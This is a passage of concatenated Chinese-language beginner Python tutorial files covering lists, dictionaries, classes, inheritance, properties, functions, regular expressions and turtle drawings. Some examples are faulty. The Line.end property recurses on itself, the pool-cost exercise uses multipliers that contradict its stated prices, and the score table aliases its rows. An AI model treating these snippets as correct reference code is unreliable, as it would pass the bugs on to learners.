print('Max:', max_value) print('Min:', min_value) if __name__ == '__main__': main() # 想一想如果最大的元素有两个要找出第二大的又该怎么做 File: Day01-15/code/Day07/list1.py """ 定义和使用列表 - 用下标访问元素 - 添加元素 - 删除元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', '@pple', 'strawberry', 'waxberry'] print(fruits) # 通过下标访问元素 print(fruits[0]) print(fruits[1]) print(fruits[-1]) print(fruits[-2]) # print(fruits[-5]) # IndexError # print(fruits[4]) # IndexError fruits[1] = 'apple' print(fruits) # 添加元素 fruits.append('pitaya') fruits.insert(0, 'banana') print(fruits) # 删除元素 del fruits[1] fruits.pop() fruits.pop(0) fruits.remove('apple') print(fruits) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict2.py """ 字典的常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): stu = {'name': '骆昊', 'age': 38, 'gender': True} print(stu) print(stu.keys()) print(stu.values()) print(stu.items()) for elem in stu.items(): print(elem) print(elem[0], elem[1]) if 'age' in stu: stu['age'] = 20 print(stu) stu.setdefault('score', 60) print(stu) stu.setdefault('score', 100) print(stu) stu['score'] = 100 print(stu) if __name__ == '__main__': main() File: Day01-15/code/Day07/yanghui.py """ 输出10行的杨辉三角 - 二项式的n次方展开系数 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 ... ... ... Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): num = int(input('Number of rows: ')) yh = [[]] * num for row in range(len(yh)): yh[row] = [None] * (row + 1) for col in range(len(yh[row])): if col == 0 or col == row: yh[row][col] = 1 else: yh[row][col] = yh[row - 1][col] + yh[row - 1][col - 1] print(yh[row][col], end='\t') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/fibonacci.py """ 生成斐波拉切数列 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): f = [1 , 1] for i in range(2, 20): f += [f[i - 1] + f[i - 2]] # f.append(f[i - 1] + f[i - 2]) for val in f: print(val, end=' ') if __name__ == '__main__': main() File: Day01-15/code/Day07/scoretable.py """ 学生考试成绩表 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): names = ['关羽', '张飞', '赵云', '马超', '黄忠'] subjs = ['语文', '数学', '英语'] scores = [[0] * 3] * 5 for row, name in enumerate(names): print('请输入%s的成绩' % name) for col, subj in enumerate(subjs): scores[row][col] = float(input(subj + ': ')) print(scores) # for row, name in enumerate(names): # print('请输入%s的成绩' % name) # scores[row] = [None] * len(subjs) # for col, subj in enumerate(subjs): # score = float(input(subj + ': ')) # scores[row][col] = score # print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day09/rational.py """ 运算符重载 - 自定义分数类 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import gcd class Rational(object): def __init__(self, num, den=1): if den == 0: raise ValueError('分母不能为0') self._num = num self._den = den self.normalize() def simplify(self): x = abs(self._num) y = abs(self._den) factor = gcd(x, y) if factor > 1: self._num //= factor self._den //= factor return self def normalize(self): if self._den < 0: self._den = -self._den self._num = -self._num return self def __add__(self, other): new_num = self._num * other._den + other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __sub__(self, other): new_num = self._num * other._den - other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __mul__(self, other): new_num = self._num * other._num new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __truediv__(self, other): new_num = self._num * other._den new_den = self._den * other._num return Rational(new_num, new_den).simplify().normalize() def __str__(self): if self._num == 0: return '0' elif self._den == 1: return str(self._num) else: return '(%d/%d)' % (self._num, self._den) if __name__ == '__main__': r1 = Rational(2, 3) print(r1) r2 = Rational(6, -8) print(r2) print(r2.simplify()) print('%s + %s = %s' % (r1, r2, r1 + r2)) print('%s - %s = %s' % (r1, r2, r1 - r2)) print('%s * %s = %s' % (r1, r2, r1 * r2)) print('%s / %s = %s' % (r1, r2, r1 / r2)) File: Day01-15/code/Day09/pet.py from abc import ABCMeta, abstractmethod class Pet(object, metaclass=ABCMeta): def __init__(self, nickname): self._nickname = nickname @abstractmethod def make_voice(self): pass class Dog(Pet): def make_voice(self): print('%s: 汪汪汪...' % self._nickname) class Cat(Pet): def make_voice(self): print('%s: 喵...喵...' % self._nickname) def main(): pets = [Dog('旺财'), Cat('凯蒂'), Dog('大黄')] for pet in pets: pet.make_voice() if __name__ == '__main__': main() File: Day01-15/code/Day09/diamond.py """ 多重继承 - 菱形继承(钻石继承) - C3算法(替代DFS的算法) Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class A(object): def foo(self): print('foo of A') class B(A): pass class C(A): def foo(self): print('foo fo C') class D(B, C): pass class E(D): def foo(self): print('foo in E') super().foo() super(B, self).foo() super(C, self).foo() if __name__ == '__main__': d = D() d.foo() e = E() e.foo() File: Day01-15/code/Day09/clock.py from time import time, localtime, sleep class Clock(object): """数字时钟""" def __init__(self, hour=0, minute=0, second=0): self._hour = hour self._minute = minute self._second = second @classmethod def now(cls): ctime = localtime(time()) return cls(ctime.tm_hour, ctime.tm_min, ctime.tm_sec) def run(self): """走字""" self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): """显示时间""" return '%02d:%02d:%02d' % \ (self._hour, self._minute, self._second) def main(): clock = Clock.now() while True: print(clock.show()) sleep(1) clock.run() if __name__ == '__main__': main() File: Day01-15/code/Day09/car1.py """ 属性的使用 - 访问器/修改器/删除器 - 使用__slots__对属性加以限制 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): __slots__ = ('_brand', '_max_speed') def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed @property def brand(self): return self._brand @brand.setter def brand(self, brand): self._brand = brand @brand.deleter def brand(self): del self._brand @property def max_speed(self): return self._max_speed @max_speed.setter def max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" # 使用__slots__属性限制后下面的代码将产生异常 # car.current_speed = 80 print(car) # 如果提供了删除器可以执行下面的代码 # del car.brand # 属性的实现 print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) print(Car.brand.fdel) # 通过上面的代码帮助学生理解之前提到的包装器的概念 # Python中有很多类似的语法糖后面还会出现这样的东西 File: Day01-15/code/Day09/multi.py """ 多重继承 - 通过多重继承可以给一个类的对象具备多方面的能力 - 这样在设计类的时候可以避免设计太多层次的复杂的继承关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Father(object): def __init__(self, name): self._name = name def gamble(self): print('%s在打麻将.' % self._name) def eat(self): print('%s在大吃大喝.' % self._name) class Monk(object): def __init__(self, name): self._name = name def eat(self): print('%s在吃斋.' % self._name) def chant(self): print('%s在念经.' % self._name) class Musician(object): def __init__(self, name): self._name = name def eat(self): print('%s在细嚼慢咽.' % self._name) def play_piano(self): print('%s在弹钢琴.' % self._name) # 试一试下面的代码看看有什么区别 # class Son(Monk, Father, Musician): # class Son(Musician, Father, Monk): class Son(Father, Monk, Musician): def __init__(self, name): Father.__init__(self, name) Monk.__init__(self, name) Musician.__init__(self, name) son = Son('王大锤') son.gamble() # 调用继承自Father的eat方法 son.eat() son.chant() son.play_piano() File: Day01-15/code/Day09/association.py """ 对象之间的关联关系 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Point(object): def __init__(self, x=0, y=0): self._x = x self._y = y def move_to(self, x, y): self._x = x self._y = y def move_by(self, dx, dy): self._x += dx self._y += dy def distance_to(self, other): dx = self._x - other._x dy = self._y - other._y return sqrt(dx ** 2 + dy ** 2) def __str__(self): return '(%s, %s)' % (str(self._x), str(self._y)) class Line(object): def __init__(self, start=Point(0, 0), end=Point(0, 0)): self._start = start self._end = end @property def start(self): return self._start @start.setter def start(self, start): self._start = start @property def end(self): return self.end @end.setter def end(self, end): self._end = end @property def length(self): return self._start.distance_to(self._end) if __name__ == '__main__': p1 = Point(3, 5) print(p1) p2 = Point(-2, -1.5) print(p2) line = Line(p1, p2) print(line.length) line.start.move_to(2, 1) line.end = Point(1, 2) print(line.length) File: Day01-15/code/Day09/dependency.py """ 对象之间的依赖关系和运算符重载 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self._brand = brand self._max_speed = max_speed self._current_speed = 0 @property def brand(self): return self._brand def accelerate(self, delta): self._current_speed += delta if self._current_speed > self._max_speed: self._current_speed = self._max_speed def brake(self): self._current_speed = 0 def __str__(self): return '%s当前时速%d' % (self._brand, self._current_speed) class Student(object): def __init__(self, name, age): self._name = name self._age = age @property def name(self): return self._name # 学生和车之间存在依赖关系 - 学生使用了汽车 def drive(self, car): print('%s驾驶着%s欢快的行驶在去西天的路上' % (self._name, car._brand)) car.accelerate(30) print(car) car.accelerate(50) print(car) car.accelerate(50) print(car) def study(self, course_name): print('%s正在学习%s.' % (self._name, course_name)) def watch_av(self): if self._age < 18: print('%s只能观看《熊出没》.' % self._name) else: print('%s正在观看岛国爱情动作片.' % self._name) # 重载大于(>)运算符 def __gt__(self, other): return self._age > other._age # 重载小于(<)运算符 def __lt__(self, other): return self._age < other._age if __name__ == '__main__': stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() car = Car('QQ', 120) stu2.drive(car) print(stu1 > stu2) print(stu1 < stu2) File: Day01-15/code/Day09/triangle.py """ 实例方法和类方法的应用 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import sqrt class Triangle(object): def __init__(self, a, b, c): self._a = a self._b = b self._c = c # 静态方法 @staticmethod def is_valid(a, b, c): return a + b > c and b + c > a and c + a > b # 实例方法 def perimeter(self): return self._a + self._b + self._c # 实例方法 def area(self): p = self.perimeter() / 2 return sqrt(p * (p - self._a) * (p - self._b) * (p - self._c)) if __name__ == '__main__': # 用字符串的split方法将字符串拆分成一个列表 # 再通过map函数对列表中的每个字符串进行映射处理成小数 a, b, c = map(float, input('请输入三条边: ').split()) # 先判断给定长度的三条边能否构成三角形 # 如果能才创建三角形对象 if Triangle.is_valid(a, b, c): tri = Triangle(a, b, c) print('周长:', tri.perimeter()) print('面积:', tri.area()) # 如果传入对象作为方法参数也可以通过类调用实例方法 # print('周长:', Triangle.perimeter(tri)) # print('面积:', Triangle.area(tri)) # 看看下面的代码就知道其实二者本质上是一致的 # print(type(tri.perimeter)) # print(type(Triangle.perimeter)) else: print('不能构成三角形.') File: Day01-15/code/Day09/employee.py """ 抽象类 / 方法重写 / 多态 实现一个工资结算系统 公司有三种类型的员工 - 部门经理固定月薪12000元/月 - 程序员按本月工作小时数每小时100元 - 销售员1500元/月的底薪加上本月销售额5%的提成 输入员工的信息 输出每位员工的月薪信息 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod class Employee(object, metaclass=ABCMeta): def __init__(self, name): self._name = name @property def name(self): return self._name @abstractmethod def get_salary(self): pass class Manager(Employee): # 想一想: 如果不定义构造方法会怎么样 def __init__(self, name): # 想一想: 如果不调用父类构造器会怎么样 super().__init__(name) def get_salary(self): return 12000 class Programmer(Employee): def __init__(self, name): super().__init__(name) def set_working_hour(self, working_hour): self._working_hour = working_hour def get_salary(self): return 100 * self._working_hour class Salesman(Employee): def __init__(self, name): super().__init__(name) def set_sales(self, sales): self._sales = sales def get_salary(self): return 1500 + self._sales * 0.05 if __name__ == '__main__': emps = [Manager('武则天'), Programmer('狄仁杰'), Salesman('白元芳')] for emp in emps: if isinstance(emp, Programmer): working_hour = int(input('请输入%s本月工作时间: ' % emp.name)) emp.set_working_hour(working_hour) elif isinstance(emp, Salesman): sales = float(input('请输入%s本月销售额: ' % emp.name)) emp.set_sales(sales) print('%s本月月薪为: ¥%.2f元' % (emp.name, emp.get_salary())) File: Day01-15/code/Day09/car2.py """ 属性的使用 - 使用已有方法定义访问器/修改器/删除器 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ class Car(object): def __init__(self, brand, max_speed): self.set_brand(brand) self.set_max_speed(max_speed) def get_brand(self): return self._brand def set_brand(self, brand): self._brand = brand def get_max_speed(self): return self._max_speed def set_max_speed(self, max_speed): if max_speed < 0: raise ValueError('Invalid max speed for car') self._max_speed = max_speed def __str__(self): return 'Car: [品牌=%s, 最高时速=%d]' % (self._brand, self._max_speed) # 用已有的修改器和访问器定义属性 brand = property(get_brand, set_brand) max_speed = property(get_max_speed, set_max_speed) car = Car('QQ', 120) print(car) # ValueError # car.max_speed = -100 car.max_speed = 320 car.brand = "Benz" print(car) print(Car.brand) print(Car.brand.fget) print(Car.brand.fset) File: Day01-15/code/Day09/shape.py """ 继承的应用 - 抽象类 - 抽象方法 - 方法重写 - 多态 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from abc import ABCMeta, abstractmethod from math import pi class Shape(object, metaclass=ABCMeta): @abstractmethod def perimeter(self): pass @abstractmethod def area(self): pass class Circle(Shape): def __init__(self, radius): self._radius = radius def perimeter(self): return 2 * pi * self._radius def area(self): return pi * self._radius ** 2 def __str__(self): return '我是一个圆' class Rect(Shape): def __init__(self, width, height): self._width = width self._height = height def perimeter(self): return 2 * (self._width + self._height) def area(self): return self._width * self._height def __str__(self): return '我是一个矩形' if __name__ == '__main__': shapes = [Circle(5), Circle(3.2), Rect(3.2, 6.3)] for shape in shapes: print(shape) print('周长:', shape.perimeter()) print('面积:', shape.area()) File: Day01-15/code/Day08/circle.py """ 练习 修一个游泳池 半径(以米为单位)在程序运行时输入 游泳池外修一条3米宽的过道 过道的外侧修一圈围墙 已知过道的造价为25元每平米 围墙的造价为32.5元每米 输出围墙和过道的总造价分别是多少钱(精确到小数点后2位) Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import math class Circle(object): def __init__(self, radius): self._radius = radius @property def radius(self): return self._radius @radius.setter def radius(self, radius): self._radius = radius if radius > 0 else 0 @property def perimeter(self): return 2 * math.pi * self._radius @property def area(self): return math.pi * self._radius * self._radius if __name__ == '__main__': radius = float(input('请输入游泳池的半径: ')) small = Circle(radius) big = Circle(radius + 3) print('围墙的造价为: ¥%.1f元' % (big.perimeter * 115)) print('过道的造价为: ¥%.1f元' % ((big.area - small.area) * 65)) File: Day01-15/code/Day08/guess.py """ 面向对象版本的猜数字游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ from random import randint class GuessMachine(object): def __init__(self): self._answer = None self._counter = None self._hint = None def reset(self): self._answer = randint(1, 100) self._counter = 0 self._hint = None def guess(self, your_answer): self._counter += 1 if your_answer > self._answer: self._hint = '小一点' elif your_answer < self._answer: self._hint = '大一点' else: self._hint = '恭喜你猜对了' return True return False @property def counter(self): return self._counter @property def hint(self): return self._hint if __name__ == '__main__': gm = GuessMachine() play_again = True while play_again: game_over = False gm.reset() while not game_over: your_answer = int(input('请输入: ')) game_over = gm.guess(your_answer) print(gm.hint) if gm.counter > 7: print('智商余额不足!') play_again = input('再玩一次?(yes|no)') == 'yes' File: Day01-15/code/Day08/hack.py """ 另一种创建类的方式 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def bar(self, name): self._name = name def foo(self, course_name): print('%s正在学习%s.' % (self._name, course_name)) def main(): Student = type('Student', (object,), dict(__init__=bar, study=foo)) stu1 = Student('骆昊') stu1.study('Python程序设计') if __name__ == '__main__': main() File: Day01-15/code/Day08/clock.py """ 定义和使用时钟类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ import time import os class Clock(object): # Python中的函数是没有重载的概念的 # 因为Python中函数的参数没有类型而且支持缺省参数和可变参数 # 用关键字参数让构造器可以传入任意多个参数来实现其他语言中的构造器重载 def __init__(self, **kw): if 'hour' in kw and 'minute' in kw and 'second' in kw: self._hour = kw['hour'] self._minute = kw['minute'] self._second = kw['second'] else: tm = time.localtime(time.time()) self._hour = tm.tm_hour self._minute = tm.tm_min self._second = tm.tm_sec def run(self): self._second += 1 if self._second == 60: self._second = 0 self._minute += 1 if self._minute == 60: self._minute = 0 self._hour += 1 if self._hour == 24: self._hour = 0 def show(self): return '%02d:%02d:%02d' % (self._hour, self._minute, self._second) if __name__ == '__main__': # clock = Clock(hour=10, minute=5, second=58) clock = Clock() while True: os.system('clear') print(clock.show()) time.sleep(1) clock.run() File: Day01-15/code/Day08/access.py class Test: def __init__(self, foo): self.__foo = foo def __bar(self): print(self.__foo) print('__bar') def main(): test = Test('hello') test._Test__bar() print(test._Test__foo) if __name__ == "__main__": main() File: Day01-15/code/Day08/rect.py """ 定义和使用矩形类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ class Rect(object): """矩形类""" def __init__(self, width=0, height=0): """初始化方法""" self.__width = width self.__height = height def perimeter(self): """计算周长""" return (self.__width + self.__height) * 2 def area(self): """计算面积""" return self.__width * self.__height def __str__(self): """矩形对象的字符串表达式""" return '矩形[%f,%f]' % (self.__width, self.__height) def __del__(self): """析构器""" print('销毁矩形对象') if __name__ == '__main__': rect1 = Rect() print(rect1) print(rect1.perimeter()) print(rect1.area()) rect2 = Rect(3.5, 4.5) print(rect2) print(rect2.perimeter()) print(rect2.area()) File: Day01-15/code/Day08/student.py """ 定义和使用学生类 Version: 0.1 Author: 骆昊 Date: 2018-03-08 """ def _foo(): print('test') class Student(object): # __init__是一个特殊方法用于在创建对象时进行初始化操作 # 通过这个方法我们可以为学生对象绑定name和age两个属性 def __init__(self, name, age): self.name = name self.age = age def study(self, course_name): print('%s正在学习%s.' % (self.name, course_name)) # PEP 8要求标识符的名字用全小写多个单词用下划线连接 # 但是很多程序员和公司更倾向于使用驼峰命名法(驼峰标识) def watch_av(self): if self.age < 18: print('%s只能观看《熊出没》.' % self.name) else: print('%s正在观看岛国大电影.' % self.name) def main(): stu1 = Student('骆昊', 38) stu1.study('Python程序设计') stu1.watch_av() stu2 = Student('王大锤', 15) stu2.study('思想品德') stu2.watch_av() if __name__ == '__main__': main() File: Day01-15/code/Day06/function6.py """ 作用域问题 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 局部作用域 def foo1(): a = 5 foo1() # print(a) # NameError # 全局作用域 b = 10 def foo2(): print(b) foo2() def foo3(): b = 100 # 局部变量 print(b) foo3() print(b) def foo4(): global b b = 200 # 全局变量 print(b) foo4() print(b) File: Day01-15/code/Day06/function2.py """ 函数的定义和使用 - 求最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def gcd(x, y): if x > y: (x, y) = (y, x) for factor in range(x, 1, -1): if x % factor == 0 and y % factor == 0: return factor return 1 def lcm(x, y): return x * y // gcd(x, y) print(gcd(15, 27)) print(lcm(15, 27)) File: Day01-15/code/Day06/function3.py """ Python的内置函数 - 数学相关: abs / divmod / pow / round / min / max / sum - 序列相关: len / range / next / filter / map / sorted / slice / reversed - 类型转换: chr / ord / str / bool / int / float / complex / bin / oct / hex - 数据结构: dict / list / set / tuple - 其他函数: all / any / id / input / open / print / type Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ def myfilter(mystr): return len(mystr) == 6 # help() print(chr(0x9a86)) print(hex(ord('骆'))) print(abs(-1.2345)) print(round(-1.2345)) print(pow(1.2345, 5)) fruits = ['orange', 'peach', 'durian', 'watermelon'] print(fruits[slice(1, 3)]) fruits2 = list(filter(myfilter, fruits)) print(fruits) print(fruits2) File: Day01-15/code/Day06/function4.py """ Python常用模块 - 运行时服务相关模块: copy / pickle / sys / ... - 数学相关模块: decimal / math / random / ... - 字符串处理模块: codecs / re / ... - 文件处理相关模块: shutil / gzip / ... - 操作系统服务相关模块: datetime / os / time / logging / io / ... - 进程和线程相关模块: multiprocessing / threading / queue - 网络应用相关模块: ftplib / http / smtplib / urllib / ... - Web编程相关模块: cgi / webbrowser - 数据处理和编码模块: base64 / csv / html.parser / json / xml / ... Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ import time import shutil import os seconds = time.time() print(seconds) localtime = time.localtime(seconds) print(localtime) print(localtime.tm_year) print(localtime.tm_mon) print(localtime.tm_mday) asctime = time.asctime(localtime) print(asctime) strtime = time.strftime('%Y-%m-%d %H:%M:%S', localtime) print(strtime) mydate = time.strptime('2018-1-1', '%Y-%m-%d') print(mydate) shutil.copy('/Users/Hao/hello.py', '/Users/Hao/Desktop/first.py') os.system('ls -l') os.chdir('/Users/Hao') os.system('ls -l') os.mkdir('test') File: Day01-15/code/Day06/function5.py """ 函数的参数 - 位置参数 - 可变参数 - 关键字参数 - 命名关键字参数 Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 参数默认值 def f1(a, b=5, c=10): return a + b * 2 + c * 3 print(f1(1, 2, 3)) print(f1(100, 200)) print(f1(100)) print(f1(c=2, b=3, a=1)) # 可变参数 def f2(*args): sum = 0 for num in args: sum += num return sum print(f2(1, 2, 3)) print(f2(1, 2, 3, 4, 5)) print(f2()) # 关键字参数 def f3(**kw): if 'name' in kw: print('欢迎你%s!' % kw['name']) elif 'tel' in kw: print('你的联系电话是: %s!' % kw['tel']) else: print('没找到你的个人信息!') param = {'name': '骆昊', 'age': 38} f3(**param) f3(name='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, tel='13866778899') f3(user='骆昊', age=38, mobile='13866778899') File: Day01-15/code/Day06/function1.py """ 函数的定义和使用 - 计算组合数C(7,3) Version: 0.1 Author: 骆昊 Date: 2018-03-05 """ # 将求阶乘的功能封装成一个函数 def factorial(n): result = 1 for num in range(1, n + 1): result *= num return result print(factorial(7) // factorial(3) // factorial(4)) File: Day01-15/code/Day01/hello.py """ 第一个Python程序 - hello, world! 向伟大的Dennis M. Ritchie先生致敬 Version: 0.1 Author: 骆昊 Date: 2018-02-26 请将该文件命名为hello.py 使用Windows的小伙伴可以在命令行提示下通过下面的命令运行该程序 python hello.py 对于使用Linux或macOS的小伙伴可以打开终端并键入下面的命令来运行程序 python3 hello.py """ print('hello, world!') # print("你好,世界!") print('你好', '世界') print('hello', 'world', sep=', ', end='!') print('goodbye, world', end='!\n') File: Day01-15/code/Day01/flag.py """ 用Python的turtle模块绘制国旗 """ import turtle def draw_rectangle(x, y, width, height): """绘制矩形""" turtle.goto(x, y) turtle.pencolor('red') turtle.fillcolor('red') turtle.begin_fill() for i in range(2): turtle.forward(width) turtle.left(90) turtle.forward(height) turtle.left(90) turtle.end_fill() def draw_star(x, y, radius): """绘制五角星""" turtle.setpos(x, y) pos1 = turtle.pos() turtle.circle(-radius, 72) pos2 = turtle.pos() turtle.circle(-radius, 72) pos3 = turtle.pos() turtle.circle(-radius, 72) pos4 = turtle.pos() turtle.circle(-radius, 72) pos5 = turtle.pos() turtle.color('yellow', 'yellow') turtle.begin_fill() turtle.goto(pos3) turtle.goto(pos1) turtle.goto(pos4) turtle.goto(pos2) turtle.goto(pos5) turtle.end_fill() def main(): """主程序""" turtle.speed(12) turtle.penup() x, y = -270, -180 # 画国旗主体 width, height = 540, 360 draw_rectangle(x, y, width, height) # 画大星星 pice = 22 center_x, center_y = x + 5 * pice, y + height - pice * 5 turtle.goto(center_x, center_y) turtle.left(90) turtle.forward(pice * 3) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice * 3) x_poses, y_poses = [10, 12, 12, 10], [2, 4, 7, 9] # 画小星星 for x_pos, y_pos in zip(x_poses, y_poses): turtle.goto(x + x_pos * pice, y + height - y_pos * pice) turtle.left(turtle.towards(center_x, center_y) - turtle.heading()) turtle.forward(pice) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice) # 隐藏海龟 turtle.ht() # 显示绘图窗口 turtle.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day01/peppa_pig.py """ 绘制小猪佩奇 """ from turtle import * def nose(x,y): """画鼻子""" penup() # 将海龟移动到指定的坐标 goto(x,y) pendown() # 设置海龟的方向(0-东、90-北、180-西、270-南) setheading(-30) begin_fill() a = 0.4 for i in range(120): if 0 <= i < 30 or 60 <= i <90: a = a + 0.08 # 向左转3度 left(3) # 向前走 forward(a) else: a = a - 0.08 left(3) forward(a) end_fill() penup() setheading(90) forward(25) setheading(0) forward(10) pendown() # 设置画笔的颜色(红, 绿, 蓝) pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() penup() setheading(0) forward(20) pendown() pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() def head(x, y): """画头""" color((255, 155, 192), "pink") penup() goto(x,y) setheading(0) pendown() begin_fill() setheading(180) circle(300, -30) circle(100, -60) circle(80, -100) circle(150, -20) circle(60, -95) setheading(161) circle(-300, 15) penup() goto(-100, 100) pendown() setheading(-30) a = 0.4 for i in range(60): if 0<= i < 30 or 60 <= i < 90: a = a + 0.08 lt(3) #向左转3度 fd(a) #向前走a的步长 else: a = a - 0.08 lt(3) fd(a) end_fill() def ears(x,y): """画耳朵""" color((255, 155, 192), "pink") penup() goto(x, y) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 54) end_fill() penup() setheading(90) forward(-12) setheading(0) forward(30) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 56) end_fill() def eyes(x,y): """画眼睛""" color((255, 155, 192), "white") penup() setheading(90) forward(-20) setheading(0) forward(-95) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) end_fill() color((255, 155, 192), "white") penup() seth(90) forward(-25) seth(0) forward(40) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) end_fill() def cheek(x,y): """画脸颊""" color((255, 155, 192)) penup() goto(x,y) pendown() setheading(0) begin_fill() circle(30) end_fill() def mouth(x,y): """画嘴巴""" color(239, 69, 19) penup() goto(x, y) pendown() setheading(-80) circle(30, 40) circle(40, 80) def setting(): """设置参数""" pensize(4) # 隐藏海龟 hideturtle() colormode(255) color((255, 155, 192), "pink") setup(840, 500) speed(10) def main(): """主函数""" setting() nose(-100, 100) head(-69, 167) ears(0, 160) eyes(0, 140) cheek(80, 10) mouth(-20, 30) done() if __name__ == '__main__': main() File: Day01-15/code/Day12/str2.py """ 字符串常用操作 - 实现字符串倒转的方法 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ from io import StringIO def reverse_str1(str): return str[::-1] def reverse_str2(str): if len(str) <= 1: return str return reverse_str2(str[1:]) + str[0:1] def reverse_str3(str): # StringIO对象是Python中的可变字符串 # 不应该使用不变字符串做字符串连接操作 因为会产生很多无用字符串对象 rstr = StringIO() str_len = len(str) for index in range(str_len - 1, -1, -1): rstr.write(str[index]) return rstr.getvalue() def reverse_str4(str): return ''.join(str[index] for index in range(len(str) - 1, -1, -1)) def reverse_str5(str): # 将字符串处理成列表 str_list = list(str) str_len = len(str) # 使用zip函数将两个序列合并成一个产生元组的迭代器 # 每次正好可以取到一前一后两个下标来实现元素的交换 for i, j in zip(range(str_len // 2), range(str_len - 1, str_len // 2, -1)): str_list[i], str_list[j] = str_list[j], str_list[i] # 将列表元素连接成字符串 return ''.join(str_list) if __name__ == '__main__': str = 'I love Python' print(reverse_str1(str)) print(str) print(reverse_str2(str)) print(str) print(reverse_str3(str)) print(str) print(reverse_str4(str)) print(str) print(reverse_str5(str)) print(str) File: Day01-15/code/Day12/test4.py import re def main(): # 创建正则表达式对象 使用了前瞻和回顾来保证手机号前后不应该出现数字 pattern = re.compile(r'(?<=\D)(1[38]\d{9}|14[57]\d{8}|15[0-35-9]\d{8}|17[678]\d{8})(?=\D)') sentence = ''' 重要的事情说8130123456789遍,我的手机号是13512346789这个靓号, 不是15600998765,也是110或119,王大锤的手机号才是15600998765。 ''' # 查找所有匹配并保存到一个列表中 mylist = re.findall(pattern, sentence) print(mylist) print('--------华丽的分隔线--------') # 通过迭代器取出匹配对象并获得匹配的内容 for temp in pattern.finditer(sentence): print(temp.group()) print('--------华丽的分隔线--------') # 通过search函数指定搜索位置找出所有匹配 m = pattern.search(sentence) while m: print(m.group()) m = pattern.search(sentence, m.end()) if __name__ == '__main__': main() File: Day01-15/code/Day12/test5.py """ 不良内容过滤 """ import re def main(): sentence = '你丫是傻叉吗? 我操你大爷的. Fuck you.' purified = re.sub('[操肏艹]|fuck|shit|傻[比屄逼叉缺吊屌]|煞笔', '*', sentence, flags=re.IGNORECASE) print(purified) if __name__ == '__main__': main() File: Day01-15/code/Day12/test3.py """ 验证输入用户名和QQ号是否有效并给出对应的提示信息 要求: 用户名必须由字母、数字或下划线构成且长度在6~20个字符之间 QQ号是5~12的数字且首位不能为0 """ import re def main(): username = input('请输入用户名: ') qq = input('请输入QQ号: ') m1 = re.match(r'^[0-9a-zA-Z_]{6,20}$', username) if not m1: print('请输入有效的用户名.') m2 = re.match(r'^[1-9]\d{4,11}$', qq) if not m2: print('请输入有效的QQ号.') if m1 and m2: print('你输入的信息是有效的!') if __name__ == '__main__': main() File: Day01-15/code/Day12/str1.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ import pyperclip # 转义字符 print('My brother\'s name is \'007\'') # 原始字符串 print(r'My brother\'s name is \'007\'') str = 'hello123world' print('he' in str) print('her' in str) # 字符串是否只包含字母 print(str.isalpha()) # 字符串是否只包含字母和数字 print(str.isalnum()) # 字符串是否只包含数字 print(str.isdecimal()) print(str[0:5].isalpha()) print(str[5:8].isdecimal()) list = ['床前明月光', '疑是地上霜', '举头望明月', '低头思故乡'] print('-'.join(list)) 